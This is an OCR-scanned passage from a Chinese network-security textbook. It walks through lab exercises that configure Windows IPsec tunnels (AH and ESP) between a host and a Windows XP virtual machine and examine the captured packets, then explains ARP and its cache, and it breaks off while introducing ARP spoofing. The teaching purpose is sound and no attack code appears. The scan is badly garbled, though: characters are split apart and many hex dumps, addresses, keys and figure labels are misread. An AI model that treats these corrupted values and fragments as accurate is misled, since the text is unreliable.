据 不 加 密 的 完整 性 ”完整 性 算法 选择 MD5-~ 连 续 两 次 单 击 “ 确 定 ? 按 钮 在 “新 筛选 器 操 
作 属 性 ?对 话 框 中 可 见 新 添加 的 筛选 器 操作 ,如 图 3-21 所 示 。 
单 击 “ 确 定 ” 按 钮 一 选中 新 添加 的 筛选 器 操作 . 单 击 * 身 份 验证 方法 ?标签 一 单 击 * 添 
加 ”按钮 一 选中 * 预 共享 密 钥 -输入 共享 密 钥 “86982480” 一 单 击 “确定 ?按钮 一 选中 "预先 
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寻 址 ”| 协议 | 描述 | 


源 地 址 G): 一 一 一 
一 个 特定 的 IF 地 址 


亚 地 址 @): | 192 . 168 . 111 . 
了 网 模 码 0D): | 255 . 255 . 255 . 255 


目标 地 址 钾 ) : 

一 个 特定 的 IP 地 址 了 
王 地 址 @): 上 | 192 . 168 . 111 . 2 
子 网 掩 码 外) 255 -255 .255 . 255 


灰 镜像 。 同 时 与 源 地 址 和 目标 地 址 正好 相反 的 数据 包 相 匹配 Q)。 


IP 协议 及 其 安全 问题 


”人 四 
册 除 四 ) 


区 面 
| 地 移 右 


厂 接受 不 安全 的 通讯 ， 但 总 是 用 IPSee 响应 
厂 允许 和 不 支持 IPSee 的 计算 机 进行 不 安全 的 通讯 0) 
厂 会 话 才 名 完 全 疝 前 保密 Prs) @) 


图 3-20 设置 源 和 目的 IP 地址 


Ci CR 
新 添加 的 筛选 器 操作 


图 3-21 


Ese 


共享 的 密 钥 ” 一 单 击 * 上 移 ” 按 钮 将 其 移动 到 第 一 的 位 置 ( 见 图 3-22) 一 单 击 “应 用 ?按钮 一 


单 击 “确定 ?按钮 ,至 此 本 机 端 设 置 完成 。 


第 二 步 : 开通 Windows XP 虚拟 机 的 IPSec 通道 。 
开通 Windows XP 虚拟 机 的 IPSec 通道 (步骤 同上 ) ,只 是 源 和 目的 IP 地 址 进行 了 对 


换 , 见 图 3-23 。 


新 规则 属性 
Tr 第 选 器 列表 | 第 渤 器 党 作 | 身份 验证 方法 | 隆 道 设置 | 连接 类 型 | 


二 
身份 验证 方法 首选 硕 序 ) 


86962480 
Kerberos 


图 3-22 设置 的 预 共享 密 钥 


寻 址 | 协议 | 描述 | 


| 调幅 址 人 @): 
| [从 定 的 下 地 十 = 


环 地 址 LD): | 192 . 168 . 111 . 
网 掩 码 包 255 . 255 . 255 


厂 目标 地 址 四 ) 
一 个 特定 的 I 地 址 四 
了 王 地 址 G): 上 192 . 168 . 111 . 


了 网 撞 码 区 i 


人 镜像 。 同 时 与 源 地 址 和 目标 地 址 正好 相反 的 数据 包 相 匹 二 (0)。 


图 3-23 设置 源 和 目的 卫 地址 


第 三 步 : 在 本 机 和 Windows XP 虚拟 机 指派 安全 策略 。 
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在 本 机 指派 AA 安全 策略 , 右 击 AA 一 选择 “指派 ”, 同 样 指派 Windows XP 虚拟 机 上 
的 BB 安全 策略 。 至 此 本 机 和 Windows XP 虚拟 机 之 间 的 IPSec 通道 开通 完成 ,在 这 两 
台 主 机 之 间 传 输 的 数据 都 将 受到 AH 协议 的 完整 性 保护 ,如 图 3-24 和 图 3-25 所 示 。 
至 本 地 安全 设置 


文件 区 ) 操作 () ”查看 局) 帮助 0D 
+ 七 | 徇 导 


邓 安全 设置 名 称 / 描述 第 略 忆 指派 
账户 策略 画 从 


是 
由 国 本 地 策略 父 安 全 服务 器 “全 要 对 所 有 ITP 通讯 名 是 使 用 Kerberos 信任 请 求 安全 。 否 
站 父 客 户主 ( 羽 响 应 】 。。 正 第 通讯 不 安全 的 )。 使 用 默认 的 响应 规则 与 请 示 .. ，。 否 
L 3 | 状 新 IF 安全 策略 理 
电 EE 加 | 全 服务 器 (8 家 安全 ) 对 所 有 二 通讯 总 是 使 用 Kerberos 信任 请 家 安全 。..。 理 


< 


图 3-24 在 本 机 指派 AA 安全 策略 


局 本 地 安全 设置 
文件 人 E) 操作 查看 WW) 帮助 D 


描述 


是 
他 安全 服务 器 博 要 .， 对 所 有 I 通讯 总 是 使 理 
着 客户 请 ( 羽 响应 ) 正常 通讯 不 安全 的 )。 EE 
(请 求 安全 ) 讯 总 : 
晶 匡 安全 策略, 在 本 地 计 例 服 务 器 (请 求 安全 ) 。 对 所 有 IF 通讯 总 是 使 否 


图 3-25 在 Windows XP 虚拟 机 指派 BB 安全 策略 


第 四 步 : 在 本 机 浏览 Windows XP 虚拟 机 的 网 页 ,同时 使 用 Sniffer Pro 捕获 、 分 
析 数 据 。 

使 用 Sniffer Pro 捕获 的 数据 包 如 图 3-26 所 示 , 从 中 可 以 清楚 看 到 IKE 协商 过 程 和 
AH 的 通信 过 程 。 


日 CCPC-A6E3DA4AS1 。 | [192.168.111.2] |ISAKMP: Header 


CCPC-A6E3DA4A51 ~ |ISAKMP: Header 


10 |CCPC-AGE3DAAAS1 |[192.168.111.2] |ISAKMP: Header 
11 |[192.168.111.2] CCPC-A6E3DA4AS1 ISAKMP: Header 
12 | CCPC—-ABE3DA4AS1 [192.168.111.2] ISAKMP: Header 
13 |[192.168,111.2] |CCPC-A6E3DA4ASI |ISAKMP: Header IKE 协 商 过 程 


| 
[192.168.111.2] |ISAKMP: Header 
[ ] ICCPC-A6E3DA4AS1 |ISAKMP: Header 
16 |cCPC-A6E3DA4A51 |[192.168.111.2] |ISAKMP: Header 
2 CCPC-A6E3DA4AS AKMP eadi 
| [192.168.111.2] cP: 了 syn WIN=6553! 
19 |[192.168.111.2] 。 |CCPC-A6E3DA4ASI 
120 。 | CCPC-A6E3DA4A5 2 2 
21 。 | CCPC-A6E3DA4A5I 


22 |[192.168.111.2] 。 |CCPC-A6E3DA4A5I AH 
23 | 5192 168.111.2] |CCPC-A6E3DA4ASI 通信 
24 | CCPC-A6E3DA4A51 [192.168.111.2] Fe 
25 |CCPC-ASE3DAAAS1 |[192.168.111.2] 过 程 


25 |[192.168.111.2] |CCPC-A6E3DA4AS1 
27 |[192.168.111.2] 
28 。 | CCPC-A6E3DA4A5 


29 1[192.168.111.2] 


[192.168.111.2] 


图 3-26 使 用 Sniffer Pro 查看 到 的 IPSec 通信 过 程 


从 图 3-26 可 以 看 出 ,传输 的 数据 包 没 有 进行 加 密 , 但 具体 查看 通信 数据 会 发 现 每 个 
数据 包 中 都 加 入 了 一 个 AH 首部 。 图 3-27 为 本 机 发 给 Web 服务 器 的 一 个 数据 包 , 可 以 
看 到 在 IP 首部 后 面 增加 了 24 字 节 的 AH 首部 ,各 字段 含义 如 图 3-27 所 示 , 其 中 12 字 节 
的 鉴别 数据 保证 了 整个 IP 数据 报 的 完整 性 。 
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< 


田 世 DIC: Ethertype=0800. size=78 bytes 
由 入 IP: D=[192.168.111.2] S=[192.168.111.1] LEN=44 ID=11511 


日 嫌 IPAUTH IP Authentication Header 
IPAUTH 
IPAUTH: Protocol = 6 (TCP) 


IPAUTH: PayLoad Length = 4 (24 bytes) 

IPAUTH: Reserved = 0 

IPAUTH: Security Parameters Index = 0x37977228 

电 IPAUTH: Sequence nunber = 0x00000004 
IPAUTH: [ 12 Bytes Authentication Data ] 


白 贞 TCP D=80 S=1454 ACK=4036987018 WIN=65535 
le PI 


reserved 


24 21|39 00 50156 co 00 01108 00 45 00 ..)$19.PV? E 
£7 40100 80 33|6e 3f c0 a8léf 01 c0 a8 .@. 艇 ,ec3n? 括 o. 括 
2 J 口 


05 ae 00 50 b4 cs ?P 磁 
my 包 F 亚 P ? 


图 3-27 在 每 个 数据 包 中 都 加 入 了 一 个 AH 首部 


3.52 测试 开通 IPSec 通道 .选择 ESP、 提 供 完 整 性 


1. 测试 环境 
实验 环境 同 3. 5. 1 节 ,这 里 不 再 袭 述 。 


2 测试 目的 

在 上 一 个 实验 的 基础 上 修改 IPSec 通道 ,选择 ESP ,提供 完整 性 。 使 用 Sniffer Pro 捕 
获 客户 访问 Web 服务 器 过 程 中 传输 的 数据 包 , 通 过 分 析 捕 获 的 数据 ,进一步 理解 ESP 的 
格式 和 作用 。 


3. 实验 步骤 

第 一 步 : 修改 本 机 IPSec 安全 策略 ,选择 ESP ,提供 完整 性 。 

在 本 机 右 击 AA 策略 一 选择 “属性 ”一 选中 *AA 筛选 器 ”一 单 击 “ 筛 选 器 操作 ”标签 一 
选中 之 前 创建 的 新 筛选 器 操作 一 单 击 “ 编 辑 ” 一 再 次 单 击 “ 编 辑 ” 一 选择 “ 仅 保 持 完整 性 ”一 
单 击 “ 确 定 ” 按 钮 一 单 击 * 应 用 ”按钮 一 单 击 * 确 定 ” 按 钮 直至 关闭 窗口 ,至 此 本 机 修改 
完成 。 

第 二 步 : 修改 Windows XP 虚拟 机 IPSec 安全 策略 ,选择 ESP, 提 供 完 整 性 (步骤 略 ) 。 

第 三 步 : 在 本 机 浏览 Windows XP 虚拟 机 的 网 页 ,同时 使 用 Sniffer Pro 捕获 、 分 
析 数 据 。 

使 用 Sniffer Pro 捕获 的 数据 包 如 图 3-28 所 示 , 从 中 可 以 清楚 看 到 IKE 协商 过 程 和 
ESP 的 通信 过 程 。 

通过 逐一 查看 ESP 通信 报 文 可 以 发 现 , 报 文 携带 的 应 用 层 数 据 没有 进行 加 密 , 但 每 
个 报 文 都 增加 了 ESP 首部 、ESP 尾部 和 鉴别 数据 ,用 于 保证 报 文 的 完整 性 ,如 图 3-29 
所 示 。 

图 3-29 是 Windows XP 虚拟 机 发 给 本 机 的 一 个 数据 包 , 可 见 其 包含 8 字 节 ESP 首 
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部 、9 字 节 ESP 尾部 和 12 字 节 鉴别 数据 。 在 ESP 首部 中 SPI 字段 值 为 0x5E961238, 转 
换 为 十 进 制 为 1586893368,SEQ 字段 值 为 22。 在 ESP 尾部 中 前 7 个 字 节 是 填充 项 ,填充 
数据 长 度 字段 为 7, 协 议 字段 值 为 6 表明 传输 层 采用 TCP。 最 后 12 字 节 的 鉴别 数据 用 于 
保证 报 文 的 完整 性 。 从 图 3-29 可 见 ,HTTP 数据 部 分 以 明文 方式 传递 。 


ISAKMP: Header lL 
ISAKMP: Header 下 IKE 协 商 过 程 


der 

IP: ESP SPI=1332444409 

IP: ESP SBI=1586893368 

IPB: ESP SPI=1332444409 

: ESP SPI=1332444409 

IP: ESP SPI=1586893368 ESP 
IP: ESP SPI=1586893368 下 
IP: ESP SPI=1586893368 | 
IP: ESP SPI=1332444409 

IP: ESP SPI=1332444409 

IP: ESP SPI=1586893368 

IP: ESP SPI=1586893368 

IP: ESP SPI=1332444409 


己 

号 

加 

DN 

上 

a 

中 

- 

by 

I 
PR 

四 

ND 

-~ 

下 

口 

~ 

只 

I 
PP 

站 
mT 


四 世 DiC Ethertype-0800, size=246 bytes 
田 和 车 IP D=[192.168.111.1] S=[192.168.111.2] LEN=212 ID=30257 
器 网 ESP: IP ESP -———— 


ESP 
ESP: Security Parameters Index = 1586893368 
ESP: Sequence Nunber = 22 


ESP: Payload Data 005005D0684C47CC448AB1355018FAF063 


SPI SEQ 


00000000: 00 50 56 20. 090.9909 29 24 21 39 08 00 45 00 .PV? )$19.. 下 

00000010: 00 e8 76 31|40 00 80 32|24 5e c0 a8 6f 02 c0 a8 . 秆 18.c2$^ 手 o 括 

00000020 o 

00000030 

00000040 

00000050 

00000060 

00000070 

00000080 http 
00000090 data 
000000a0 : 

000000b0 

000000c0 : 

000000d0 : 

000000e0 

000000f0 


auth data 
stuff protocol 


图 3-29 每 个 报 文中 都 增加 了 ESP 首部 、ESP 尾部 和 鉴别 数据 


auth data 


353 测试 开通 IPSec 通道 .选择 ESP、 提 供 保密 性 和 完整 性 

1 测试 环境 

实验 环境 同 3. 5. 1 节 , 这 里 不 再 次 述 。 

2 测试 目的 

在 上 一 个 实验 的 基础 上 修改 IPSec 通道 ,选择 ESP, 提供 保密 性 和 完整 性 。 使 用 


Sniffer Pro 捕获 客户 访问 Web 服务 器 过 程 中 传输 的 数据 包 , 通 过 分 析 捕 获 的 数据 , 进 一 
步 理 解 ESP 的 格式 和 作用 。 
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3. 测试 步骤 

第 一 步 : 修改 本 机 IPSec 安全 策略 ,选择 ESP ,提供 保密 性 和 完整 性 。 

在 本 机 右 击 AA 策略 一 选择 “属性 ”一 选中 AA 筛选 器 一 单 击 “ 筛 选 器 操作 ?标签 一 选 
中 之 前 创建 的 新 筛选 器 操作 一 单 击 “ 编 辑 ” 一 再 次 单 击 * 编 辑 ” 一 选择 “加 密 并 保持 完整 性 ” 
一 单 击 “确定 ”按钮 一 单 击 “应 用 ”按钮 一 单 击 “ 确 定 ” 按 钮 一 直至 关闭 窗口 ,至 此 本 机 修改 
完成 。 

第 二 步 : 修改 Windows XP 虚拟 机 IPSec 安全 策略 ,选择 ESP, 提 供 保密 性 和 完整 

第 三 步 : 在 本 机 浏览 Windows XP 虚拟 机 的 网 页 ,同时 使 用 Sniffer Pro 捕获 .分 析 
数据 。 

使 用 Sniffer Pro 捕获 的 数据 包 如 图 3-30 所 示 , 从 中 可 以 清楚 看 到 IKE 协商 过 程 和 
ESP 的 通信 过 程 。 


§ [132 168 32 368. 114.72] 18M: Beader 

. 所 而 5 号 leader 
6 [192.168.111.1] |[192.168.111.2] |ISAKMP: Header 「 广 IEKE 协 商 过 程 
网 [192.168.111.2] 必 生 人 和 他- 省 生生 和 ISAKMP: Header 
8 [192.168.111.1] 上 392368: 1 2 IP: ESP SPI=1151756021 
9 |[192.168.111.2] |[192.168.111.1] |IP: ESP SPI=204223127 
10 |[192.168.111.1] [192.168.111.2] IP: ESP SPI=1151756021 
.460. 2141.] [192.168.111.2] IP: ESP SPI=1151756021 ESP 
12 |[192.168.111.2] [192.168.111.1] IP: ESP SPI=20422312 J 
13 |[192.168.111.:2] |[192.168.111.1] |IP: ESP SPI=204223127 
14 |[192.168.111.1] [192.168.111.2] IP: ESP SPI=1151756021 
| [192.168.111.2] IP: ESP SPI=1151756021 
16 192.168.111.2 92.36 昌 . 王 1 主 , 主 IP: ESP SPI=204223127 


图 3-30 ”使 用 Sniffer Pro 查看 到 的 IPSec 通信 过 程 


通过 逐一 查看 ESP 通信 报 文 可 以 发 现 , 报 文 携带 的 应 用 层 数 据 都 进行 了 加 密 ， 
图 3-31 是 Web 服务 器 发 送 给 客户 机 的 一 个 数据 包 ,可见 包含 8 字 节 的 ESP 首部 ,应 用 层 
数据 都 进行 了 加 密 。 


口 9 [192.168.111.2] [192.168.111.1]  IP: ESP SPI=204223127 | 
Ce ~ 


田震 DIC: Ethertype=0800. size=94 bytes 
四 入 IP: D=[192.168.111.1] S=[192.168.111.2] LEN=60 ID=59893 
[= 


ESP 

ESP: Security Parameters Index = 204223127 

ESP: Sequence Nunber = 1 

ESP: Payload Data = C315ED09A83C9C4CBF21743BA41E8AE1D8EFA 
ESP header 


00000000 : 
00000010 : 


00 50 56 c0 00 01|00 Oc 29 24 21 39 08 00 45 00 .PY?...)$19 
00 50 e9 £5 40 00180 32 bl 31 c0 a8 6f 02 c0 a8 .P 秆 @.52? 括 吕 括 
6f 01 品 


00000040 : 
100000050: 


图 3-31 每 个 报 文 都 进行 了 加 密 


思考 题 


1. IP 数据 报 在 从 源 主机 发 送 到 目的 主机 的 过 程 中 ,数据 报 中 的 源 和 目的 IP 地 址 如 
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何 变化 ? 


Dw 


. IP 首部 的 协议 字段 起 什么 作用 ? 
. 为 什么 IP 校 验 和 只 涉及 首部 ? 


IP 首部 中 的 TTL 字段 起 什么 作用 ? 
IP 协议 为 什么 设置 分 片 和 重组 机 制 ? 


. 网 络 地 址 转换 (NAT) 解 决 什么 问题 ? 
. NAT 日 志 的 作用 是 什么 ? 


网 络 安全 基础 


小 
性 


ARP 及 ARP 欺骗 


”| 地址 解析 协议 ARP 


IP 地 址 和 MAC 地 址 都 是 主机 的 唯一 标识 ,但 IP 地 址 在 全 世界 范围 内 是 唯一 的 , 实 
现 全 网 范围 内 主机 到 主机 的 通信 。MAC 地 址 是 在 物理 网 络 内 唯一 的 ,在 全 世界 范围 内 
不 一 定 是 唯一 的 , 它 实 现 了 物理 网 络 范围 内 主机 到 主机 的 通信 。 

因特网 是 由 多 个 物理 网 络 组 成 的 。 一 个 由 源 主 机 产生 的 IP 数据 报 在 其 最 终 到 达 目 
的 主机 之 前 ,可 能 会 通过 几 个 不 同 的 物理 网 络 。 在 IP 数据 报 的 整个 传递 过 程 中 源 和 目的 
IP 地 址 始终 不 变 , 而 源 和 目的 MAC 地 址 在 每 个 物理 网 络 中 都 会 发 生变 化 。 

如 图 4-1 所 示 的 网 络 环境 标 出 了 每 台 主 机 和 路 由 器 的 接口 IP 及 MAC 地 址 , 现 分 析 
主机 1 发 送 给 主机 2 的 IP 数据 报 的 传输 过 程 。 该 数据 报 分 三 阶段 传递 , 即 先 由 主机 1 传 
给 路 由 器 1, 再 由 路 由 器 1 转发 给 路 由 器 2, 最 后 由 路 由 器 2 转发 给 主机 2。 各 个 阶段 数据 
报 的 IP 及 MAC 地 址 配置 情况 如 图 4-1 所 示 。 通 过 分 析 可 以 发 现 ,在 传输 过 程 中 IP 地 址 
始终 不 变 , 实 现 了 全 网 范围 内 定位 主机 ,而 MAC 地 址 在 不 断 发 生变 化 。 

IP:10.1.1.10 


主机 1 全 MAC:01-01-01-01-01-01 
10.1.1.0 
IP:10.1.1.1 IP:20.2.1.1 IP:20.1i12 
MAC:02-02-02-02-02-02 ~、 MAC:03-03-03-03-03-03 MAC:04-04-04-04-04-04 
路 由 器 1 20.1.1.0 router2 
IP:30.1.1.1 > 

(1) 主机 1 到 路 由 器 1 之 间 传 递 的 报 文 MAC:05-05-05-05-05-05, 
目的 MAC:02-02-02-02-02-02 30.1.10 
源 MAC:01-01-01-01-01-01 
目的 IP:30.1.1.10 
源 IP:10.1.1.10 
(2) 路 由 器 1 到 路 由 器 2 之 间 传 递 的 报 文 ”(3) 路 由 器 2 到 主机 2 之 间 传 递 的 报 文 主机 2 
目的 MAC:04-04-04-04-04-04 目的 MAC:06-06-06-06-06-06 
源 MAC:03-03-03-03-03-03 源 MAC:05-05-05-05-05-05 IP:30.1.1.10 
目的 IP:30.1.1.10 目的 IP:30.1.1.10 MAC:06-06-06-06-06-06 
源 IP:10.1.1.10 源 IP:10.1.1.10 


图 4-1 全 数据 报 的 传递 过 程 
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地 址 解析 协议 (Address Resolution Protocol,ARP) 负 责 将 一 个 IP 地 址 映射 为 对 应 
的 MAC 地 址 。 在 如 图 4-2 所 示 的 网 络 环境 中 ,三 台 主 机 连接 到 一 台 交 换 机 上 ,旁边 给 出 
了 交换 机 的 MAC 地 址 转换 表 。 下 面 举例 说 明 ARP 的 工作 流程 。 主 机 2 在 已 知 主机 3 
的 IP 地 址 的 情况 下 ,要 获得 主机 3 的 MAC 地址 ,这 时 它 在 网 络 上 广播 一 个 ARP 请 求 报 
文 ,询问 IP 地 址 为 192. 168.0. 3 的 主机 你 的 MAC 地 址 是 多 少 ? 为 了 产生 广播 效果 , 报 
文 的 目的 MAC 地 址 设置 为 FF-FF-FF-FF-FF-FF, 交 换 机 收 到 这 个 ARP 请 求 报 文 之 后 
会 在 2、3 端口 转发 这 个 数据 报 。 


MAC 地 址 转换 表 
00-50-56-c0-00-01 <-> 1 
00-41-30-00-10-50 <-> 2 
00-0c-29-d7-65-03 <-> 3 


192.168.0.3 
00-41-30-00-10-50 上 


192.168.0.2 画 192.168.0.1 
00-50-56-c0-00-01 会 天 £7 00-0c-29-d7-65-03 


主机 2 主机 1 
图 4-2 主机 2 以 广播 方式 发 给 主机 3 的 ARP 请 求 报 文 


如 图 4-3 所 示 ,局域网 中 所 有 主机 都 会 收 到 这 个 ARP 请 求 报 文 , 但 主机 3 之 外 的 其 
他 主机 发 现 这 不 是 在 询问 自己 的 MAC 地 址 ,它们 不 会 作出 应 答 。 而 主机 3 识别 这 是 在 
询问 自己 的 MAC 地 址 ,于 是 它 给 主机 2 返回 一 个 单 播 的 ARP 应 答 报 文 , 报 文中 携带 了 
自己 的 MAC 地址。 为 了 产生 单 播 效果 , 报 文 的 目的 MAC 地 址 设置 为 主机 2 的 MAC。 
交换 机 收 到 这 个 ARP 应 答 报 文 之 后 ,通过 查找 MAC 地 址 转换 表 , 只 在 端口 1 转发 这 个 
ARP 应 答 报 文 。 最 后 主机 2 从 收 到 的 ARP 应 等 报 文中 提取 出 主机 3 的 MAC 地 址 。 


主机 3 
192.168.0.3 MAC 地 址 转换 表 
00-41-30-00-10-50 00-50-56-c0-00-01 <-> 1 
| 00-41-30-00-10-50 <-> 2 
| 00-0c-29-d7-65-03 <-> 3 
+ | 2 


192.168.0.2 画 | 192.168.0.1 
00-50-56-c0-00-01 Ly 总 00-0c-29-d7-65-03 
主机 2 主机 1 


图 4-3 主机 3 以 单 播 方式 返回 给 主机 2 的 ARP 应 答 报 文 


4.2 ARP 数据 报 的 格式 


ARP 数据 报 格 式 如 图 4-4 所 示 。 各 个 字段 的 含义 如 下 。 
(1) 硬件 类 型 (hardware type) : 这 是 一 个 2 字 节 字段 。ARP 能 工作 在 任何 类 型 的 物 
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理 网 络 上 ,这 个 字段 定义 了 运行 ARP 的 物理 网 络 类 型 ,每 种 类 型 的 物理 网 络 都 被 分 配 了 
一 个 整数 。 例 如 1 代表 以 太 网 。 

(2) 协议 类 型 (protocol type) : 这 是 一 个 2 字 节 字段 。 定 义 了 物理 网 络 上 运行 的 协 
议 类 型 。 例 如 0x0800 代表 IPv4 协议 。 

(3) 硬件 长 度 (hardware length) : 这 是 一 个 1 字 节 字段 。 该 字 节 定义 了 物理 地 址 的 
长 度 。 对 于 以 太 网 , 值 为 6。 

(4) 协议 长 度 (protocol length): 这 是 一 个 1 字 节 
度 。 对 于 IPv4 协议 , 值 为 4。 

(5) 操作 类 型 (operation) : 这 是 一 个 定义 分 组 类 型 的 2 字 节 字段 。 它 定义 了 两 种 类 
型 分 组 ,1 一 一 ARP 请 求 分 组 ,2 一 一 ARP 应 答 分 组 。 

(6) 发 送 站 MAC 地 址 (sender hardware address): 定义 了 发 送 方 的 物理 地 址 ,对 于 
以 太 网 长 度 为 6 字 节 。 

(7) 发 送 站 IP 地 址 (sender protocol address): 定义 了 发 送 方 的 IJP 地址 ,对 于 IPv4 
协议 ,该 字段 长 度 为 4。 

(8) 目标 站 MAC 地 址 (target hardware address) : 定义 了 目标 端 物 理 地 址 的 变 长 字 
段 , 对 于 以 太 网 ,长 度 为 6 字 节 。 对 于 一 个 ARP 请 求 分 组 ,因为 发 送 者 不 知道 目标 站 的 物 
理 地 址 ,因而 该 字段 全 为 0。 

(9) 目标 站 IP 地 址 (target protocol address): 定义 了 目标 站 的 IP 地 址 ,对 于 IPv4 
协议 ,该 字段 长 度 为 4。 

硬件 类 型 (2 字 节 ) 协议 类 型 (2 字 节 ) 
硬件 长 度 6 | 协议 长 度 4 | 操作 类 型 :请求 1 回答 2 

发 送 站 MAC 地 址 (6 字 节 ) 
发 送 站 IP 地 址 (4 字 节 ) 
目标 站 MAC 地 址 (6 字 节 ) 
目标 站 IP 地 址 (4 字 节 ) 


图 4-4 ARP 数据 报 的 格式 


十 
怒 


。 该 字 节 定义 了 IP 地 址 的 长 


ARP 分 组 被 直接 封装 为 数据 链 路 帧 。 如 图 4-5 所 示 , 一 个 ARP 分 组 被 封装 在 一 个 
以 太 网 帧 中 , 链 路 层 数据 包括 6 字 节 目的 MAC 地 址 .6 字 节 源 MAC 地 址 .2 字 节 协议 字 
段 ( 值 为 0x0806) 。 


ARP 请 求 或 回答 分 组 


| 


目的 地 址 | 源 地 址 | 协议 | ARP 数据 


图 4-5 ARP 分 组 的 封装 


训练 : 使 用 Sniffer Pro 捕获 .分 析 ARP 请 求 和 应 答 报 文 。 
第 一 步 : 以 host-only 方式 启动 Windows XP 虚拟 机 ,为 虚拟 机 配置 IP 地 址 为 192. 
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3. 3. 10 ,配置 本 机 IP 地 址 为 192. 3. 3. 20。 地 址 配置 结果 如 图 4-6 和 图 4-7 所 示 。 
Ethernet adapter 本 地 连接 : 


Description . - - - - - - : UMware Accelerated AMD PCNet hdapter 
Phusical hddress- . - . - : 88-8C-29-A3-78-3B 

Dhcp Enabled- - - 。 - -=- - 2 lo 

IP hddress- - - - 。 。 。 - : 192.3.3.18 

Sb Hash 5 


Description UMware Uirtual Ethernet hdapter for UNnet1 


Physical hddress 89-59-56-C96-69-61 
Dhcp Enabled 
IP hddress 


图 4-7 本 机 的 地 址 信息 


第 二 步 : 在 本 机 执行 ping 192. 3. 3. 10 ,同时 在 本 机 使 用 Sniffer Pro 捕获 .分 析 ARP 
本 机 捕获 的 ARP 请 求 和 应 答 报 文 格式 及 十 六 进 制 表示 如 图 4-8 一 图 4-11 所 示 。 注 
意 请 求 报 文 广播 方式 发 送 ,应 答 报 文 单 播 方式 发 送 。 


| ool | ogo | 
06 | 04 | 1 “| 一 ARP 请 求 报 文 
00.50.56.C0.00.01 | 一 一 发送 方 MAC: 本 机 MAC 
C0.03.03.14 “| 一 一 发送 方 IP:192.3.3.20 
00.00.00.00.00.00 | 一 一 接收 方 MAC:Windows XP 虚拟 机 MAC 
C0.03.03.0a 一 一 接收 方 IP:192.3.3.10 


14B 个 18B 


Link data 


几 28B 


FF.FF.FF.FF.FF.FF | 目的 MAC: 广 播 地 址 
00.50.56.C0.00.01 | 源 MAC: 本 机 MAC 


图 4-8 本 机 发 送 的 ARP 请 求 报 文 格式 


ARP 请 求 报 文 及 这 方 MAC: 未 和 MAC ”发 送 方 IP: 二 和 机 TI 


目的 MAC: 广 播 地 址 源 MAC: 本 抽 MAC 


0000000: £f ff ff|ff ff ff|00 50 56|c0 00 01| 08 06 00 01 :ey 
0000010: 08 00 06 04 00 01|00 50 56 c0 00 01lc0 03 03 14|....... EE 
0000020: 00 00 00 00 00 00 sc0 03 03 0a 00 00 00 00 00 00 ,..,...?....... 
0000030: 00 00 00100 00 00 00 00100 00 00 00 

接收 方 MAC 接收 方 ITP:XP 座 拟 灿 IP 


图 4-9 本 机 发 出 的 ARP 请 求 报 文 十 六 进 制 表示 
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0001 0800 
06 | 04 2 一 一 ARP 应 答 报 文 
00.0C.29.A3.70.3B | 一 一 发 送 方 MAC:Windows XP 虚拟 机 MAC 
C0.03.03.0a 一 一 发 送 方 IP:192.3.3.10 
00.50.56.C0.00.01 | 一 一 接收 方 MAC: 本 机 MAC 
C0.03.03.14 一 一 接收 方 IP:192.3.3.20 


_ 14B | 个 
Link data 0806 ARP data 
| 
U , 28B 
00.50.56.C0.00.01 | 目的 MAC: 本 机 MAC 
00.0C.29.A3.70.3B | 源 MAC:Windows XP 虚拟 机 MAC 


图 4-10 Windows XP 虚拟 机 返回 的 ARP 应 答 报 文 格式 


ARP 应 答 报 文 发 送 方 MAC:XP 庶 拟 机 发 送 方 TP: XP 惠 拟 机 
目的 MAC: 本 机 的 MA 源 MAC: RP 鹿 拟 机 MAC 


00000000: 00 50 56|c0 00 01|00 0c 29|a3 70 3b /08 06 00 01| .PV? 二 
00000010: 08 00 06 04 00 00 be 29 a3 70 3bjc0 03 03 0a 
00000020: 00 50 56 c0 00 01 co0 03 03 14 PEV? .3? 


接收 方 MAC: 本 机 接收 方 IP: 本 机 
图 4-11 Windows XP 虚拟 机 返回 的 ARP 应 答 报 文 十 六 进 制 表示 


43 ”ARP 缓存 表 


在 每 台 主 机 的 内 存 里 都 有 一 个 ARP 缓存 表 , 它 存储 了 一 些 主机 的 IP 地 址 和 MAC 
地 址 的 映射 关系 。 使 用 arp -a 查看 缓存 ,使 用 arp -d 删除 缓存 内 容 。 

图 4-12 为 查看 本 机 的 ARP 缓存 表 , 其 中 保存 了 Windows XP 虚拟 机 的 IP 和 MAC 
地 址 ,状态 为 动态 ,说 明 这 条 记录 只 能 在 缓存 中 停留 很 短 的 一 段 时 间 。 在 本 机 执行 arp -d 
命令 清空 缓存 表 ,再 次 执行 arp -a 命令 可 以 发 现 缓存 表 已 经 被 清空 ,如 图 4-13 所 示 。 


D: \¥INDOYS\systen32\cnd. exe [-Jelx] 


D:\Documents and Settings\xgt>arp -a 


Interface: 192.3.3.20 --- 9x2 
Internet Address Physical hddress Type 
192.3.3.19 9699-9c-29-a3-79-3b dynamic 


1 | » 


图 4-12 查看 本 机 的 ARP 缓存 表 


使 用 ARP 缓存 表 可 以 提高 通信 效率 。 现 举例 说 明 ,假设 主机 A 要 与 主机 B 通 信 , 如 
果 A 的 缓存 中 有 B 的 MAC 地址 , 则 直接 使 用 这 个 地 址 与 B 通 信 , 如 果 没 有 , 则 使 用 ARP 
获得 BB 的 MAC 地 址 ,并 将 其 存 人 ARP 缓存 表 。 
在 两 种 情况 下 ,主机 更 新 自己 的 ARP 缓存 表 : @ 在 收 到 ARP 应 答 报 文 时 ; @ 在 收 
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到 发 给 自己 的 ARP 请 求 报 文 时 。 


D:AWINDOWS\systea32Vcad exe 


D:\Documents and Settings\xgt>arp -d 
The specified entry was not found 


D:\Documents and Settings\xgt>arp -a 
No ARP Entries Found 


4.4 ”ARP 欺骗 


ARP 过 分 信任 网 络 内 的 信息 ,只 要 收 到 发 送 给 自己 的 ARP 请 求 报 文 或 应 答 报 文 ， 
ARP 不 加 以 任何 验证 就 根据 报 文中 的 发 送 方 IP 地 址 和 MAC 地 址 刷新 自己 的 ARP 组 
存 表 。 这 种 信任 直接 导致 了 ARP 欺骗 行为 的 产生 。ARP 欺骗 可 以 通过 两 种 方式 实现 : 
ARP 请 求 报 文 方式 ; @ARP 应 答 报 文 方式 。 下 面 分 别 介 绍 这 两 种 欺骗 方式 。 

第 一 种 方法 是 通过 伪造 的 ARP 请 求 报 文 来 实现 ARP 欺骗 。 攻 击 者 伪造 一 个 ARP 
请 求 报 文 ,在 ARP 数据 中 发 送 方 IP 和 MAC 地 址 处 填充 一 对 错误 的 映射 地 址 ,之 后 将 报 
